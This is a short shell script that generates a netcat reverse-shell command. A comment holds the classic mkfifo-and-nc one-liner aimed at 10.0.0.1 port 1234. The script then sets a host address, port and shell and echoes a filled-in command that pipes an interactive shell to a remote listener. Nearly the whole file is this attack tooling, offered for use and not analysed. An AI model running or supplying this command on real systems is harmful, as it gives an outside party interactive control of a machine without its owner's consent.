#!/bin/sh

#rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

HOST=10.75.77.90
PORT=1234
SHELL=/bin/${1:-sh}
FIFO=/tmp/f
FIFO=$(mktemp /tmp/f.XXXXXXXXXX) || exit 1

echo "rm $FIFO;mkfifo $FIFO;cat $FIFO|$SHELL -i 2>&1|nc $HOST $PORT >$FIFO"

